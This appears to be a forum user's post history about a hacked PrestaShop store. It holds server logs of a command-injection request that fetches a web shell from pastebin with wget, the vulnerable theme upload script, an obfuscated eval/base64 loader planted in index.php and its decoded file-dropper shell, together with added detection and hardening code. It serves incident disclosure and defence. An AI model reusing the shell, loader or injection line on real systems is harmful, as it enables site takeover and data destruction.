irder

Members, 341 posts

Posts posted by irder

  1. 10 hours ago, SHEINLINE said:

    For the PrestaShop 1.7 PayPal module, which version of PayPal are you using? Can you send me a copy?

    My installation is 1.7.6.2; the official PayPal module version is 5.1.2, and it can only be used with a PayPal Business account.

    Never use PayPal; it will inexplicably link your account with someone else's and ban it.

  2. 1 minute ago, razaro said:

    Yeah, and it looks like it starts from /modules/bamegamenu/ajax_phpcode.php also.

    Similar to a hack from about 3 years ago that targeted upload forms.

    Check this topic for advice.

    Yes, it's from:

    217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7

    217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297

    I installed this module, verticalmegamenus, and the first new folder was temps.

  3. 36 minutes ago, NemoPS said:

    well yeah, that's a hack. What happens if you replace the content? Are you using any module that allows uploads? I would check those folders first.

    Here are some access logs. Maybe the web shell file was uploaded in the last few lines:

    216.244.66.229 - - [12/Sep/2019:03:57:49 +0000] "GET /item/1167/chinese-letter-print-restaurant-waitress-jacket-waiter-uniform.html HTTP/1.1" 301 -
    217.61.98.64 - - [12/Sep/2019:04:09:40 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
    217.61.98.64 - - [12/Sep/2019:04:09:44 +0000] "GET /spy.php HTTP/1.1" 404 78683
    217.61.98.64 - - [12/Sep/2019:04:09:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
    217.61.98.64 - - [12/Sep/2019:04:09:47 +0000] "GET /spy.php HTTP/1.1" 404 78683
    217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
    217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /spy.php HTTP/1.1" 404 78683
    217.61.98.64 - - [12/Sep/2019:04:13:49 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744
    217.61.98.64 - - [12/Sep/2019:04:14:22 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768
    217.61.98.64 - - [12/Sep/2019:04:14:23 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718
    217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36
    217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7
    217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297
    217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
    217.61.98.64 - - [12/Sep/2019:04:14:26 +0000] "GET /spy.php HTTP/1.1" 404 78683
    217.61.98.64 - - [12/Sep/2019:04:14:27 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744
    217.61.98.64 - - [12/Sep/2019:04:15:02 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768
    217.61.98.64 - - [12/Sep/2019:04:15:03 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718
    217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36
    217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7
    217.61.98.64 - - [12/Sep/2019:04:15:05 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3302
    216.244.66.197 - - [12/Sep/2019:04:15:22 +0000] "GET /robots.txt HTTP/1.1" 200 2620
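The log above shows the whole sequence in under a minute: a probe of an eval-style endpoint (ajax_phpcode.php, 404 because that module is not installed), then POSTs to module upload scripts, then a GET of spy.php in the upload directory with a 200. The script below is an added example, not code from this thread or from PrestaShop, that runs that detection logic over sample lines. The endpoint list is an assumption seeded from the paths in the thread, and the sample lines are copied from the log quoted above; it needs PHP 8.0 or later.

```php
<?php
// Added example: triage an Apache combined-format access log for the
// "RCE probe / unauthenticated upload / fetch dropped .php" pattern seen
// in this thread. Not PrestaShop code. Endpoint list is an assumption
// built from the paths the attacker hit; extend it for your own modules.
// Requires PHP 8.0+ (str_starts_with / str_ends_with).

const UPLOAD_ENDPOINTS = [
    '/modules/verticalmegamenus/VerticalMegaMenusUploadImage.php',
    '/modules/groupcategory/GroupCategoryUploadImage.php',
    '/modules/jmsslider/ajax_jmsslider.php',
    '/modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php',
    '/modules/bamegamenu/ajax_phpcode.php',
];

/** Parse one combined-log line; returns null for lines that do not match. */
function parseLogLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $ts = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($ts === false) {
        return null;
    }
    return [
        'ip'     => $m[1],
        'time'   => $ts->getTimestamp(),
        'method' => $m[3],
        'path'   => (string)parse_url($m[4], PHP_URL_PATH),
        // Decode once so %22 / %20 become readable for the code-injection check.
        'query'  => rawurldecode((string)parse_url($m[4], PHP_URL_QUERY)),
        'status' => (int)$m[5],
    ];
}

/** Return human-readable findings for a list of raw log lines. */
function triageLog(array $lines): array
{
    $findings   = [];
    $lastUpload = [];   // ip => most recent successful hit on an upload endpoint
    foreach ($lines as $line) {
        $r = parseLogLine($line);
        if ($r === null) {
            continue;
        }
        // 1. PHP code passed in a query parameter. Reported even on 404:
        //    it tells you which module the attacker expects to find.
        if (preg_match('/\b(system|exec|passthru|shell_exec|eval|assert)\s*\(/i', $r['query'])) {
            $findings[] = sprintf('%s RCE probe %s %s?%s -> %d',
                $r['ip'], $r['method'], $r['path'], $r['query'], $r['status']);
        }
        // 2. A known unauthenticated upload endpoint that answered 200.
        if (in_array($r['path'], UPLOAD_ENDPOINTS, true)) {
            if ($r['status'] === 200) {
                $lastUpload[$r['ip']] = $r;
                $findings[] = sprintf('%s %s to upload endpoint %s returned 200',
                    $r['ip'], $r['method'], $r['path']);
            }
            continue;
        }
        // 3. A .php under /modules/ served with 200 within a minute of that
        //    upload, from the same IP: the dropped file is being executed.
        if ($r['method'] === 'GET' && $r['status'] === 200
            && str_starts_with($r['path'], '/modules/')
            && str_ends_with($r['path'], '.php')
            && isset($lastUpload[$r['ip']])
            && $r['time'] - $lastUpload[$r['ip']]['time'] <= 60) {
            $findings[] = sprintf('%s WEB SHELL %s executed %ds after %s',
                $r['ip'], $r['path'],
                $r['time'] - $lastUpload[$r['ip']]['time'],
                $lastUpload[$r['ip']]['path']);
        }
    }
    return $findings;
}

// Sample lines copied from the log quoted in this thread; pass a log file
// path as the first argument to scan a real log instead.
$sample = [
    '217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785',
    '217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /spy.php HTTP/1.1" 404 78683',
    '217.61.98.64 - - [12/Sep/2019:04:14:22 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768',
    '217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36',
    '217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7',
    '217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297',
    '216.244.66.197 - - [12/Sep/2019:04:15:22 +0000] "GET /robots.txt HTTP/1.1" 200 2620',
];
$lines = isset($argv[1]) ? file($argv[1], FILE_IGNORE_NEW_LINES) : $sample;
foreach (triageLog($lines) as $finding) {
    echo $finding, PHP_EOL;
}
```

On the sample this prints the RCE probe, the two accepted POSTs (groupcategory and verticalmegamenus) and the web shell line for images/temps/spy.php one second later. Rule 3 is deliberately narrow (only .php under /modules/); the bamegamenu payload writes to ../../spy.php in the shop root, so once you know which directories on your host are writable, widen that prefix check accordingly.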

     

  4. It's very possible the web shell file was uploaded through some module of the supershop theme.

     I also installed the kuteshop theme.

     Unluckily, the hacker deleted all my website files.

     We can be almost certain the backdoor PHP file used to get the web shell was uploaded via

     \modules\verticalmegamenus\VerticalMegaMenusUploadImage.php

     The code has a serious security problem: it doesn't verify the file type or check permissions at all.

     I bought this theme, but it ruined my store!


    <?php
    // Bootstraps PrestaShop, then saves whatever was posted as "uploadimage"
    // under images/temps/ using the client-supplied file name, unchanged.
    require_once(dirname(__FILE__).'../../../config/config.inc.php');
    require_once(dirname(__FILE__).'../../../init.php');
    require_once(dirname(__FILE__).'/verticalmegamenus.php');
    $tempPath = _PS_MODULE_DIR_.'verticalmegamenus/images/temps/';
    // No authentication or token check: any anonymous visitor reaches this point.
    $fileName = $_FILES["uploadimage"]["name"];   // attacker-controlled, e.g. "spy.php"
    $pathFile = $tempPath.$fileName;
    if(($_FILES["uploadimage"]["size"] > 1000000)){
        echo "File size is greater than 1MB";
    }else{
        // Only the size is checked; extension and content are not, so a .php
        // file lands in a web-served directory and its name is echoed back
        // (the "200 7" in the log is the 7 bytes of "spy.php").
        if (@move_uploaded_file($_FILES['uploadimage']['tmp_name'], $pathFile)) {
            echo $fileName;
        }else {
            echo "File upload failed.";
        }
    }
    ?>

     

     

     

    One of the web shell backdoor files: the index.php was modified with this code at the beginning of the file.

    <?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){   // trigger: only runs when ?3x=3x is supplied
        $func="cr"."ea"."te_"."fun"."ction";           // "create_function", split to evade string scanners
        $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");   // builds function($c){ eval('?>'.base64_decode($c)); }
        $x("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");   // base64-encoded payload (elided here)
        exit;}?><?php                                   // stop here so the real index.php never runs

    After decoding:

    <?php
    // Minimal file-dropper web shell: writes the uploaded file to whatever
    // path the client names in "path". No validation, no authentication.
    $files = @$_FILES["files"];
    if ($files["name"] != '') {
        $fullpath = $_REQUEST["path"] . $files["name"];   // destination fully attacker-controlled
        if (move_uploaded_file($files['tmp_name'], $fullpath)) {
            echo "<h1><a href='$fullpath'>Done! Open</a></h1>";
        }
    }
    // The upload form is returned on every request.
    echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="UPload"></form></body></html>';
    ?>
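For contrast with the upload script quoted in this post, here is an added example of what a hardened handler looks like. It is not the theme's or PrestaShop's code. It assumes the entry point has already refused callers without a back-office session, and that the target directory is served with PHP execution disabled; the three sample uploads in demo() are constructed here so the checks can be exercised from the command line.

```php
<?php
// Added example, not the theme's or PrestaShop's code: the checks the
// quoted VerticalMegaMenusUploadImage.php should have performed.
// Assumptions: authentication happened before this code runs, and the
// destination directory cannot execute PHP. demo() uses constructed files.

const MAX_UPLOAD_BYTES = 1000000;
const ALLOWED_IMAGES = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                        'png' => 'image/png',  'gif' => 'image/gif'];

/** Validate one $_FILES entry; returns the extension to store under, or throws. */
function validateImageUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error ' . ($file['error'] ?? 'none'));
    }
    if (($file['size'] ?? 0) > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('file larger than 1MB');
    }
    // The client-supplied name is consulted only for its extension; it never
    // becomes part of a path on disk.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGES[$ext])) {
        throw new RuntimeException("extension '$ext' not allowed");
    }
    // Sniff the bytes: a PHP script renamed to .png reports text/x-php here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_IMAGES[$ext]) {
        throw new RuntimeException("content is $mime, not " . ALLOWED_IMAGES[$ext]);
    }
    // And it must decode as an image of sane dimensions.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[0] > 8192 || $info[1] > 8192) {
        throw new RuntimeException('not a decodable image');
    }
    return $ext;
}

/** Store a validated upload under a server-chosen random name; returns that name. */
function storeImageUpload(array $file, string $dir): string
{
    $ext  = validateImageUpload($file);
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // no traversal, no double extension
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0644);
    return $name;
}

/** CLI self-check with three constructed uploads. */
function demo(): void
{
    // A real 1x1 PNG, base64-encoded (constructed test input).
    $png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
    $cases = [
        'spy.php'  => '<?php system($_GET["c"]); ?>',   // the attack from this thread
        'spy.png'  => '<?php system($_GET["c"]); ?>',   // same content, renamed
        'logo.png' => $png,                              // legitimate image
    ];
    foreach ($cases as $name => $bytes) {
        $tmp = tempnam(sys_get_temp_dir(), 'up');
        file_put_contents($tmp, $bytes);
        $file = ['name' => $name, 'tmp_name' => $tmp, 'size' => strlen($bytes), 'error' => UPLOAD_ERR_OK];
        try {
            printf("%-9s accepted as .%s\n", $name, validateImageUpload($file));
        } catch (RuntimeException $e) {
            printf("%-9s rejected: %s\n", $name, $e->getMessage());
        }
        unlink($tmp);
    }
}

if (PHP_SAPI === 'cli') {
    demo();
}
```

Run with `php upload.php`: spy.php is rejected on extension, spy.png on content type (libmagic reports text/x-php), and only logo.png passes. Authentication is the first fix and is absent from the original entirely; a PrestaShop module script should refuse to run unless the back-office employee session is valid (Context::getContext()->employee->isLoggedBack()) or a valid admin token is presented. Independently, make images/temps/ non-executable at the web server, for example an .htaccess on Apache 2.4 with `<FilesMatch "\.ph(p[0-9]?|tml)$"> Require all denied </FilesMatch>`, so that anything which slips through still cannot run.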

     
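The modified index.php above hides create_function, eval and base64_decode behind string concatenation so a plain grep for those names finds nothing. The following is an added example, not code from this thread, of a scanner that merges adjacent string literals before looking for those indicators and then decodes any long base64 run it finds. The sample file is reconstructed from the loader quoted above with a harmless payload of our own, since the real payload is redacted on this page; the merging step is a regex heuristic, not a PHP parser.

```php
<?php
// Added example, not from the thread: find a prepended "trigger + eval(base64)"
// loader of the kind shown above and recover its payload. Adjacent string
// literals are merged first so "cr"."ea"."te_"."fun"."ction" is seen as
// "create_function". The sample source and payload below are constructed.

/** Merge "a"."b" and 'a'.'b' chains into one literal, repeating until stable. */
function joinStringLiterals(string $src): string
{
    $dq = '/"((?:[^"\\\\]|\\\\.)*)"\s*\.\s*"((?:[^"\\\\]|\\\\.)*)"/';
    $sq = '/\'((?:[^\'\\\\]|\\\\.)*)\'\s*\.\s*\'((?:[^\'\\\\]|\\\\.)*)\'/';
    do {
        $prev = $src;
        $src = preg_replace_callback($dq, fn ($m) => '"' . $m[1] . $m[2] . '"', $src);
        $src = preg_replace_callback($sq, fn ($m) => "'" . $m[1] . $m[2] . "'", $src);
    } while ($src !== $prev);
    return $src;
}

/** Return indicators and decoded base64 payloads found in PHP source text. */
function scanPhpSource(string $src): array
{
    $norm  = joinStringLiterals($src);
    $found = ['indicators' => [], 'payloads' => []];

    // A request parameter used as an on/off switch, like $_GET["3x"] above.
    if (preg_match('/\$_(GET|POST|REQUEST|COOKIE)\s*\[/', $norm)) {
        $found['indicators'][] = 'request-keyed trigger';
    }
    if (preg_match_all('/\b(create_function|eval|assert|base64_decode|gzinflate|str_rot13)\b/', $norm, $m)) {
        $found['indicators'] = array_merge($found['indicators'], array_unique($m[1]));
    }
    // Long base64 runs: decode strictly, keep those that are plain text.
    if (preg_match_all('/[A-Za-z0-9+\/]{24,}={0,2}/', $norm, $m)) {
        foreach ($m[0] as $blob) {
            $dec = base64_decode($blob, true);
            if ($dec !== false && preg_match('/^[\x09\x0A\x0D\x20-\x7E]*$/', $dec)) {
                $found['payloads'][] = $dec;
            }
        }
    }
    return $found;
}

/** Walk a directory tree and return the .php files that carry indicators. */
function scanTree(string $root): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        if ($f->getExtension() === 'php') {
            $r = scanPhpSource((string)file_get_contents($f->getPathname()));
            if ($r['indicators']) {
                $hits[$f->getPathname()] = $r;
            }
        }
    }
    return $hits;
}

// Constructed sample: the loader from the thread with our own harmless payload.
$payload = base64_encode('<?php echo "constructed demo payload"; ?>');
$sample = <<<'PHP'
<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("__PAYLOAD__");
    exit;}?><?php
// legitimate index.php continues here
require dirname(__FILE__).'/config/config.inc.php';
PHP;
$sample = str_replace('__PAYLOAD__', $payload, $sample);

if (isset($argv[1])) {
    print_r(scanTree($argv[1]));
} else {
    $result = scanPhpSource($sample);
    echo 'indicators: ', implode(', ', $result['indicators']), PHP_EOL;
    foreach ($result['payloads'] as $p) {
        echo 'decoded payload: ', $p, PHP_EOL;
    }
}
```

Without arguments it reports the request-keyed trigger, create_function, eval and base64_decode on the sample and prints the decoded payload; with a path (`php scan.php /var/www/shop`) it walks the tree. Legitimate code also uses base64_decode, so compare the hits against a clean copy of the same PrestaShop and theme versions rather than treating every indicator as malicious.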

  5. [ERROR] PHP 1.7.0.0 /* PHP:ps1700_stores(); */

     

    SQL 1.7.0.0 1267 in /* Save the new IDs */ UPDATE `ps_tab_transit` tt SET `id_new_tab` = ( SELECT `id_tab` FROM `ps_tab` WHERE CONCAT(`class_name`, COALESCE(`module`, '')) = tt.`key` ): Illegal mix of collations (utf8_unicode_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation '='
